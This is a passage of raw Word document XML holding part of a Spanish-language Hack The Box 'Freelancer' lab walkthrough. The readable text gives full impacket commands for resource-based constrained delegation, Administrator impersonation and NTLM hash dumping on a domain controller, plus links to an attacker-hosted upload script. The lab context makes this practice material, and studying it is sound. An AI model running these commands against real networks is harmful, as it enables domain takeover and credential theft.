          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al utilizar la delegación restringida basada en recursos (RBCD), otorgamos a esta PC los derechos para hacerse pasar por el usuario "administrador" si pertenece al grupo "administradores de dominio".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="889000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="889000"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora necesitamos generar un ticket con getST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getST.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un script que forma parte del conjunto de herramientas de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, una colección de programas y librerías Python para trabajar con protocolos de red. Impacket es desarrollado por SecureAuth Corporation y es ampliamente utilizado en la comunidad de seguridad y pentesting. El script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getST.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> se utiliza específicamente para solicitar tickets de servicio (Service Tickets, ST) en un entorno de Active Directory utilizando una cuenta de servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">faketime -f +5h impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1003300"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora obtenemos todos los hashes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">faketime -f +5h impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3822700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtenido el hash solo es cuestion de hacer la conexion con administrador, para esto utilizamos de nuevo evil winRM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="1054100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200"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https://blog.csdn.net/m0_52742680/article/details/139441094?ops_request_misc=&amp;request_id=&amp;biz_id=102&amp;utm_term=Hack%20the%20box%20freelancer%20&amp;utm_medium=distribute.wap_search_result.none-task-blog-2~all~sobaiduweb~default-0-.nonecase&amp;spm=1018.2118.3001.4187</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7.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId45"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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ufrisk/MemProcFS/releases" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.136:8001/PSUpload.ps1" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.14.136:8000/upload" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fortra/impacket/blob/master/examples/addcomputer.py" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://juggernaut-sec.com/cve-2022-26923-certifried/#Overview_What_is_CVE-2022-26923" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mssqltips.com/sqlservertip/1020/enabling-xpcmdshell-in-sql-server/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-serve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